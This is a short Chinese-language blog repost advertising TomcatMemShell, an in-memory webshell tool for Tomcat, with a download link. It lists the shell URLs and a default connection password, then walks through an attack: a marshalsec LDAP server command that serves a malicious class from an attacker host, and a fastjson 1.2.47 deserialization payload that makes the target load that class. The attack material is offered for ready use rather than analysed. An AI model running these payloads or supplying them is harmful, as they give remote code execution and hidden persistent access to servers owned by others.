拿来即用的内存马 -- TomcatMemShell
2022-9-10 08:9:12 Author: 系统安全运维(查看原文) 阅读量:44 收藏

一、工具简介

拿来即用的Tomcat7/8/9/10版本Listener/Filter/Servlet内存马,支持注入CMD内存马和冰蝎内存马。

二、使用方法

1、Listener型/Filter型:

CMD内存马URL:xx.xx.xx.xx/?chan=whoami冰蝎内存马URL:xx.xx.xx.xx/ 默认连接密码:goautomne

2、Servlet型:

CMD内存马URL: xx.xx.xx.xx/p?chan=whoami冰蝎内存马URL: xx.xx.xx.xx/p 默认连接密码:goautomne

三、利用举例

以fastjson1.2.47版本的反序列化漏洞为例,将对应Tomcat版本的class文件,这里以ILRain.class为例,上传到web服务器,并开启LDAP服务

java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://xx.xx.xx.xx/#ILRain 9102

然后再打入fastjson漏洞的poc,就可以使用冰蝎客户端去连接了

{ "a":{ "@type":"java.lang.Class", "val":"com.sun.rowset.JdbcRowSetImpl" }, "b":{ "@type":"com.sun.rowset.JdbcRowSetImpl", "dataSourceName":"ldap://xx.xx.xx.xx:9102/123", "autoCommit":true }}

四、下载地址

项目地址:https://github.com/ce-automne/TomcatMemShell

好文推荐

红队打点评估工具推荐
干货|红队项目日常渗透笔记
实战|后台getshell+提权一把梭
一款漏洞查找器(挖漏洞的有力工具)
神兵利器 | 附下载 · 红队信息搜集扫描打点利器
神兵利器 | 分享 直接上手就用的内存马(附下载)
推荐一款自动向hackerone发送漏洞报告的扫描器
欢迎关注 系统安全运维

文章来源: http://mp.weixin.qq.com/s?__biz=Mzk0NjE0NDc5OQ==&mid=2247509776&idx=1&sn=1327ac771463905ee2bca6167170814a&chksm=c3087460f47ffd76f6fb0cd9fe6d84c994c6c35547c90f977f94d6f891b2f3f5d0dbfe13085f#rd
如有侵权请联系:admin#unsafe.sh